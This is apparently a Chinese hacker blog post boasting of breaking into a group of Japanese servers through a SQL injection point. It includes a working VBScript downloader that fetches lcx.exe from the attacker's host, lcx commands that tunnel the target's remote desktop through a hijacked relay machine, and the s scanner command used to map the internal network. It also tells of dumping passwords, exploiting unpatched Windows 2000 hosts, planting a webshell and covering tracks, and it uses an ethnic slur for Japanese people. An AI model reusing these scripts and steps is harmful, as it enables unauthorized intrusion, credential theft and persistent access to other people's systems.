實(shí)戰(zhàn)滲透日本服務(wù)器群
因?yàn)檫@一局,滲透獲取整個(gè)服務(wù)器群的權(quán)限,N臺服務(wù)器。所以寫篇文章小小虛榮下。
開局:
入手點(diǎn)是一個(gè)注射點(diǎn):sa,內(nèi)網(wǎng), 輕車熟路寫個(gè)vbs腳本,下好lcx,轉(zhuǎn)發(fā)端口。
| 以下是引用片段: down.vbs iLocal = LCase(WScript.Arguments(1)) iRemote = LCase(WScript.Arguments(0)) Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET",iRemote,0 xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile iLocal,2 use: cscript down.vbs http://ip/lcx.exe lcx.exe (路徑默認(rèn)在system32下) |
這個(gè)下載腳本可以重復(fù)使用,也不會暴露我存放工具的地址。(有些下載腳本把下載地址寫在里面,個(gè)人覺得不很好。)
由于本機(jī)連接日本網(wǎng)絡(luò)比較慢。連撥兩個(gè)VPN,再登上日本本土的一臺肉雞(我想這樣速度不會差了,ps:肉雞的作用體現(xiàn)出來了)。
加了用戶。在肉雞終端:lcx -listen 520 1982,目標(biāo)機(jī):lcx -slave myip 520 127.0.0.1 3389
ok,終端里填:127.0.0.1:1982 順利登陸。
中盤:
win2000系統(tǒng),mssql server
先抓個(gè)系統(tǒng)密碼,找下sql密碼。查看了下一些信息,并檢查是否還有同行的后門,清除之。
分析了下密碼:(數(shù)字+機(jī)器名+數(shù)字)
其他都是鳥語也看不太明白。載了幾個(gè)基本工具放個(gè)隱藏目錄。
ps:一般進(jìn)去后總得收拾下,最好不要種馬。死得快,也易暴露。
這時(shí)候就盤算著怎么拿web的權(quán)限了。(分析網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)了)
先看下網(wǎng)上鄰居:
workgroup
C**SQL2006
B**-DB
B***TENDB
....
很明顯,都是數(shù)據(jù)庫服務(wù)器。
再往上一層,又發(fā)現(xiàn)一個(gè)工作組:
web-k.**.jp
c***oo_db
...
哎,還是數(shù)據(jù)庫服務(wù)器。
ipconfig /all
192.168.10.18 只有一個(gè)內(nèi)網(wǎng)ip
ok:s tcp 192.168.10.1 192.168.10.254 80 20 /save
用s掃下內(nèi)網(wǎng)開80的機(jī)子,線程設(shè)置為20,講究精確度嘛。
很遺憾,結(jié)果出來的幾個(gè)機(jī)子都是數(shù)據(jù)庫服務(wù)器,上面并沒有網(wǎng)站。
我就納悶了,web服務(wù)器跑哪了呢?
收官:
翻了一陣子,仔細(xì)分析了網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)。最后讓我找到了:
192.168.1.1-255這段是web服務(wù)器群
接下來,用s果然掃出一片。再對應(yīng)外網(wǎng)ip,挑選溢出的下手對象(192.168.1.19)(倭奴喜歡古董級的win2000,好多補(bǔ)丁都不全,好溢出)
很舒坦地日下來,然后載個(gè)webshell放到web目錄的偏僻角落。擦擦屁股走人。
ps:圖是我溢出另外一臺數(shù)據(jù)庫服務(wù)器時(shí)截下的
【編輯推薦】
